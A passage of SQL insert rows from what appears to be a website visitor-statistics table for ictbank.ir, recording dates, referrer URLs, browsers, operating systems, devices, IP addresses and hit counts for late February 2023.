(29180,'2023-02-23','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.45','000',0,1,0),
(29181,'2023-02-23','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','42.236.10.93','000',0,1,0),
(29182,'2023-02-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','195.88.126.18','000',0,1,0),
(29183,'2023-02-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','161.97.167.199','000',0,1,0),
(29184,'2023-02-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','208.109.39.235','000',0,1,0),
(29185,'2023-02-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','103.101.225.11','000',0,1,0),
(29186,'2023-02-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','150.95.112.79','000',0,1,0),
(29187,'2023-02-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','157.245.102.38','000',0,1,0),
(29188,'2023-02-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','134.209.144.220','000',0,1,0),
(29189,'2023-02-23','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,1,0),
(29190,'2023-02-23','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.79','000',0,1,0),
(29191,'2023-02-23','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','194.169.160.62','000',0,1,0),
(29192,'2023-02-23','https://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(29193,'2023-02-23','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.187.54.241','000',0,1,0),
(29194,'2023-02-23','https://45.92.94.221/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','220.173.211.20','000',0,1,0),
(29195,'2023-02-23','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.153.16.142','000',0,1,0),
(29196,'2023-02-23','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,2,0),
(29197,'2023-02-23','https://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','139.59.32.121','000',0,1,0),
(29198,'2023-02-23','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','72.0.0.0','desktop','Unknown','','185.119.81.100','000',0,6,0),
(29199,'2023-02-23','https://ictbank.ir/blog','Safari','iOS','Unknown','mobile:smart','','','89.35.67.28','000',0,2,0),
(29200,'2023-02-23','https://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','176.9.150.35','000',0,2,0),
(29201,'2023-02-23','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','148.72.244.53','000',0,1,0),
(29202,'2023-02-23','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.193.10.108','000',0,1,0),
(29203,'2023-02-23','https://ictbank.ir/blog','Chrome','iOS','105.0.0.0','mobile:smart','iPhone','','35.93.45.144','000',0,1,0),
(29204,'2023-02-23','https://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','54.218.103.98','000',0,1,0),
(29205,'2023-02-23','https://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','34.210.67.90','000',0,1,0),
(29206,'2023-02-23','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(29207,'2023-02-23','https://ictbank.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','93.159.230.89','000',0,2,0),
(29208,'2023-02-23','https://ictbank.ir/blog','Firefox','OS X','3.0.0','desktop','Macintosh','','208.80.194.126','000',0,1,0),
(29209,'2023-02-23','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','104.131.2.167','000',0,2,0),
(29210,'2023-02-23','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(29211,'2023-02-24','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,1,0),
(29212,'2023-02-24','https://ictbank.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','93.159.230.87','000',0,1,0),
(29213,'2023-02-24','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.203.62.98','000',0,1,0),
(29214,'2023-02-24','https://ictbank.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','93.159.230.89','000',0,2,0),
(29215,'2023-02-24','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','96.0.0.0','desktop','Unknown','','185.119.81.100','000',0,2,0),
(29216,'2023-02-24','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(29217,'2023-02-24','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(29218,'2023-02-24','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,8,0),
(29219,'2023-02-24','https://ictbank.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','77.74.177.119','000',0,1,0),
(29220,'2023-02-24','https://ictbank.ir/blog','Internet Explorer','OS X','10.0','desktop','Macintosh','','99.81.216.206','000',0,1,0),
(29221,'2023-02-24','https://l.instagram.com/','Instagram','iOS','269.0.0.0.0','mobile:smart','iPhone 7','','217.160.66.99','000',0,1,0),
(29222,'2023-02-24','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.165.233','000',0,1,0),
(29223,'2023-02-24','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.90.160.130','000',0,12,0),
(29224,'2023-02-24','https://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,4,0),
(29225,'2023-02-24','https://ictbank.ir/blog','Chrome','Linux','96.0.0.0','desktop','Unknown','','75.127.0.174','000',0,1,0),
(29226,'2023-02-24','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.136','000',0,2,0),
(29227,'2023-02-24','https://ictbank.ir/hooman/admin/','Chrome','Windows','110.0.0.0','desktop','Unknown','','5.237.146.147','000',0,27,0),
(29228,'2023-02-24','https://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(29229,'2023-02-24','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.172.20','000',0,2,0),
(29230,'2023-02-24','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','144.126.151.207','000',0,10,0),
(29231,'2023-02-24','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,4,0),
(29232,'2023-02-24','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.6','000',0,1,0),
(29233,'2023-02-24','https://ictbank.ir/blog','Vivaldi','Windows','5.0.0.0','desktop','Unknown','','104.227.21.134','000',0,1,0),
(29234,'2023-02-24','http://ictbank.ir','Vivaldi','Windows','5.0.0.0','desktop','Unknown','','104.144.229.117','000',0,1,0),
(29235,'2023-02-24','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.211.55.146','000',0,1,0),
(29236,'2023-02-24','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.134','000',0,2,0),
(29237,'2023-02-24','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(29238,'2023-02-24','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,1,0),
(29239,'2023-02-24','http://www.facebook.net/','Firefox','Windows','72.0','desktop','Unknown','','147.78.47.230','000',0,2,0),
(29240,'2023-02-24','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.157.239','000',0,1,0),
(29241,'2023-02-24','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','180.149.125.165','000',0,1,0),
(29242,'2023-02-24','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.157.125','000',0,2,0),
(29243,'2023-02-24','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.88.101.3','000',0,1,0),
(29244,'2023-02-24','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.254.85.182','000',0,1,0),
(29245,'2023-02-24','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.88.94.28','000',0,1,0),
(29246,'2023-02-24','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.201.253.238','000',0,2,0),
(29247,'2023-02-24','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.108','000',0,2,0),
(29248,'2023-02-24','https://ictbank.ir/blog','Chrome','OS X','110.0.0.0','desktop','Macintosh','','5.238.234.241','000',0,32,0),
(29249,'2023-02-24','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.108','000',0,2,0),
(29250,'2023-02-24','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,1,0),
(29251,'2023-02-24','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(29252,'2023-02-24','https://ictbank.ir/blog','Chrome','Windows','80.0.0','desktop','Unknown','','88.99.184.105','000',0,1,0),
(29253,'2023-02-24','https://ictbank.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.225','000',0,1,0),
(29254,'2023-02-24','https://ictbank.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.228','000',0,1,0),
(29255,'2023-02-24','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,2,0),
(29256,'2023-02-24','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','18.209.221.243','000',0,1,0),
(29257,'2023-02-24','https://45.92.94.221/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.143','000',0,2,0),
(29258,'2023-02-25','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(29259,'2023-02-25','https://ictbank.ir/blog','Chrome','Windows','95.0.0.0','desktop','Unknown','','103.114.107.59','000',0,2,0),
(29260,'2023-02-25','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,16,0),
(29261,'2023-02-25','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,2,0),
(29262,'2023-02-25','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,1,0),
(29263,'2023-02-25','https://ictbank.ir/blog','Chrome','Windows','110.0.0.0','desktop','Unknown','','173.252.127.23','000',0,1,0),
(29264,'2023-02-25','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','209.126.77.67','000',0,10,0),
(29265,'2023-02-25','https://ictbank.ir/blog','Chrome','Windows','12.0.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(29266,'2023-02-25','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','223.247.178.167','000',0,1,0),
(29267,'2023-02-25','https://ictbank.ir/blog','Firefox','Windows','73.0','desktop','Unknown','','54.39.104.60','000',0,1,0),
(29268,'2023-02-25','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(29269,'2023-02-25','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,5,0),
(29270,'2023-02-25','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,8,0),
(29271,'2023-02-25','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','43.130.122.222','000',0,1,0),
(29272,'2023-02-25','https://ictbank.ir/blog','Chrome','Windows','59.0.0.0','desktop','Unknown','','176.9.114.107','000',0,1,0),
(29273,'2023-02-25','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.88.68.97','000',0,1,0),
(29274,'2023-02-25','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(29275,'2023-02-25','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,1,0),
(29276,'2023-02-25','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.149.84.148','000',0,1,0),
(29277,'2023-02-25','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','82.202.247.164','000',0,2,0),
(29278,'2023-02-25','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','109.198.192.130','000',0,2,0),
(29279,'2023-02-25','https://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','130.255.166.79','000',0,1,0),
(29280,'2023-02-25','https://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','130.255.166.69','000',0,1,0),
(29281,'2023-02-25','https://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','130.255.166.51','000',0,2,0),
(29282,'2023-02-25','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','64.225.75.214','000',0,5,0),
(29283,'2023-02-25','https://www.google.com/','Chrome','Android','110.0.0.0','mobile:smart','Galaxy M52','','102.41.180.66','000',0,1,0),
(29284,'2023-02-26','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','171.22.25.70','000',0,1,0),
(29285,'2023-02-26','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','209.17.114.78','000',0,1,0),
(29286,'2023-02-26','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','192.169.244.239','000',0,1,0),
(29287,'2023-02-26','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(29288,'2023-02-26','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','178.128.228.17','000',0,116,0),
(29289,'2023-02-26','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,14,0),
(29290,'2023-02-26','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','37.139.179.19','000',0,3,0),
(29291,'2023-02-26','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','3.231.152.222','000',0,1,0),
(29292,'2023-02-26','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(29293,'2023-02-26','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(29294,'2023-02-26','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.142.141.105','000',0,1,0),
(29295,'2023-02-26','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,2,0),
(29296,'2023-02-26','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','217.116.232.205','000',0,1,0),
(29297,'2023-02-26','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.37.56.138','000',0,1,0),
(29298,'2023-02-26','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,30,0),
(29299,'2023-02-26','https://ictbank.ir/blog','Chrome','Linux','12.0.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(29300,'2023-02-26','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.39','000',0,1,0),
(29301,'2023-02-26','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','144.172.73.16','000',0,1,0),
(29302,'2023-02-26','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','171.25.193.80','000',0,1,0),
(29303,'2023-02-26','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','23.152.225.3','000',0,6,0),
(29304,'2023-02-26','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.103.113','000',0,1,0),
(29305,'2023-02-26','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,1,0),
(29306,'2023-02-26','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(29307,'2023-02-26','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','65.21.206.46','000',0,1,0),
(29308,'2023-02-26','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.217.56.37','000',0,1,0),
(29309,'2023-02-26','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','121.196.169.184','000',0,1,0),
(29310,'2023-02-26','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(29311,'2023-02-26','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.153.84.6','000',0,1,0),
(29312,'2023-02-26','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','94.102.49.190','000',0,2,0),
(29313,'2023-02-26','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.20','000',0,1,0),
(29314,'2023-02-26','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','195.39.106.198','000',0,2,0),
(29315,'2023-02-27','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','195.39.106.198','000',0,101,0),
(29316,'2023-02-27','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,10,0),
(29317,'2023-02-27','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.121','000',0,4,0),
(29318,'2023-02-27','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(29319,'2023-02-27','https://ictbank.ir/blog','Chrome','Linux','89.0.0.0','desktop','Unknown','','144.91.106.14','000',0,3,0),
(29320,'2023-02-27','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','185.142.236.41','000',0,2,0),
(29321,'2023-02-27','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.198.105.74','000',0,1,0),
(29322,'2023-02-27','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.237.126','000',0,1,0),
(29323,'2023-02-27','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.88.6.178','000',0,1,0),
(29324,'2023-02-27','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.254.16.187','000',0,1,0),
(29325,'2023-02-27','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.251.15.21','000',0,1,0),
(29326,'2023-02-27','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(29327,'2023-02-27','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','36.40.66.38','000',0,1,0),
(29328,'2023-02-27','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(29329,'2023-02-27','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.163.68.86','000',0,1,0),
(29330,'2023-02-27','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','192.236.193.184','000',0,1,0),
(29331,'2023-02-27','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.54','000',0,2,0),
(29332,'2023-02-27','https://ictbank.ir/hooman/admin/','Chrome','Windows','110.0.0.0','desktop','Unknown','','5.237.174.30','000',0,59,0),
(29333,'2023-02-27','https://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','54.87.106.110','000',0,1,0),
(29334,'2023-02-27','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.217.63.232','000',0,1,0),
(29335,'2023-02-27','https://ictbank.ir/blog','Chrome','OS X','104.0.0','desktop','Macintosh','','106.75.126.212','000',0,17,0),
(29336,'2023-02-27','https://ictbank.ir/blog','Chrome','Android','80.0.0.0','mobile:smart','Galaxy S20','','149.56.150.68','000',0,1,0),
(29337,'2023-02-27','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','204.48.26.148','000',0,1,0),
(29338,'2023-02-27','https://ictbank.ir/blog/','Chrome','Windows','90.0.0.0','desktop','Unknown','','136.169.243.74','000',0,4,0),
(29339,'2023-02-27','https://ictbank.ir/hooman/admin/index.php?pid=teachers','Chrome','Windows','110.0.0.0','desktop','Unknown','','151.247.44.143','000',0,109,0),
(29340,'2023-02-27','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.89.193.162','000',0,1,0),
(29341,'2023-02-27','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.94.161','000',0,1,0),
(29342,'2023-02-27','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.86.63','000',0,1,0),
(29343,'2023-02-27','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.94.159','000',0,1,0),
(29344,'2023-02-27','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.87.97','000',0,1,0),
(29345,'2023-02-27','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.152.255','000',0,2,0),
(29346,'2023-02-27','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.89.213.242','000',0,1,0),
(29347,'2023-02-27','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,4,0),
(29348,'2023-02-27','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','188.166.94.189','000',0,1,0),
(29349,'2023-02-27','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','114.108.148.220','000',0,1,0),
(29350,'2023-02-27','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','178.124.210.118','000',0,1,0),
(29351,'2023-02-27','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','192.119.91.242','000',0,1,0),
(29352,'2023-02-27','https://ictbank.ir/blog','Safari','iOS','Unknown','mobile:smart','','','185.126.0.93','000',0,2,0),
(29353,'2023-02-27','https://ictbank.ir/hooman/admin/index.php?pid=courses','Chrome','Windows','110.0.0.0','desktop','Unknown','','5.237.132.97','000',0,1,0),
(29354,'2023-02-27','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.44','000',0,2,0),
(29355,'2023-02-27','https://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','193.35.18.117','000',0,1,0),
(29356,'2023-02-27','http://www.facebook.net/','Firefox','Windows','72.0','desktop','Unknown','','147.78.47.230','000',0,1,0),
(29357,'2023-02-27','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','164.68.99.251','000',0,1,0),
(29358,'2023-02-27','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','42.117.2.213','000',0,1,0),
(29359,'2023-02-28','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,4,0),
(29360,'2023-02-28','https://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(29361,'2023-02-28','https://ictbank.ir/blog','Chrome','Linux','89.0.0.0','desktop','Unknown','','144.91.106.14','000',0,3,0),
(29362,'2023-02-28','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','96.126.115.39','000',0,4,0),
(29363,'2023-02-28','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.7','000',0,2,0),
(29364,'2023-02-28','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(29365,'2023-02-28','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.6','000',0,1,0),
(29366,'2023-02-28','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','124.217.226.56','000',0,1,0),
(29367,'2023-02-28','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','36.40.72.66','000',0,1,0),
(29368,'2023-02-28','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(29369,'2023-02-28','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(29370,'2023-02-28','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.36','000',0,2,0),
(29371,'2023-02-28','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.137','000',0,1,0),
(29372,'2023-02-28','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','83.169.1.186','000',0,116,0),
(29373,'2023-02-28','https://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','178.128.126.187','000',0,2,0),
(29374,'2023-02-28','https://design-arena.ir/blog/','Chrome','Windows','90.0.0.0','desktop','Unknown','','62.204.41.199','000',0,1,0),
(29375,'2023-02-28','http://www.google.com.hk','Chrome','Windows','42.0.0.0','desktop','Unknown','','209.141.51.44','000',0,3,0),
(29376,'2023-02-28','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','117.254.86.42','000',0,1,0),
(29377,'2023-02-28','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','5.160.95.179','000',0,11,0),
(29378,'2023-02-28','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(29379,'2023-02-28','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','71.6.158.166','000',0,2,0),
(29380,'2023-02-28','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','101.34.223.139','000',0,4,0),
(29381,'2023-02-28','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','101.199.254.201','000',0,1,0),
(29382,'2023-02-28','https://ictbank.ir/blog','Chrome','OS X','81.0.0.0','desktop','Macintosh','','101.199.254.232','000',0,1,0),
(29383,'2023-02-28','https://ictbank.ir/blog','Chrome','OS X','81.0.0.0','desktop','Macintosh','','101.199.254.230','000',0,1,0),
(29384,'2023-02-28','https://ictbank.ir/blog','Chrome','Linux','108.0.0.0','desktop','Unknown','','44.236.207.248','000',0,1,0),
(29385,'2023-02-28','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,1,0),
(29386,'2023-02-28','https://ictbank.ir/hooman/admin/','Chrome','Windows','110.0.0.0','desktop','Unknown','','31.7.107.176','000',0,13,0),
(29387,'2023-02-28','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','185.105.3.46','000',0,1,0),
(29388,'2023-02-28','https://www.google.com/','Chrome','Windows','105.0.0.0','desktop','Unknown','','90.160.8.130','000',0,2,0),
(29389,'2023-02-28','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.136','000',0,2,0),
(29390,'2023-02-28','https://ictbank.ir/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','101.199.254.203','000',0,1,0),
(29391,'2023-02-28','https://ictbank.ir/hooman/admin/index.php?pid=students&student_id=20&func=courses','Chrome','Windows','110.0.0.0','desktop','Unknown','','5.237.135.12','000',0,34,0),
(29392,'2023-02-28','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.149.102.65','000',0,1,0),
(29393,'2023-02-28','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,4,0),
(29394,'2023-02-28','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','192.119.110.180','000',0,1,0),
(29395,'2023-02-28','https://ictbank.ir/blog','Firefox','Windows','77.0','desktop','Unknown','','193.33.132.200','000',0,1,0),
(29396,'2023-02-28','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','80.76.51.29','000',0,4,0),
(29397,'2023-02-28','https://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','94.247.172.129','000',0,1,0),
(29398,'2023-02-28','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','89.12.8.222','000',0,3,0),
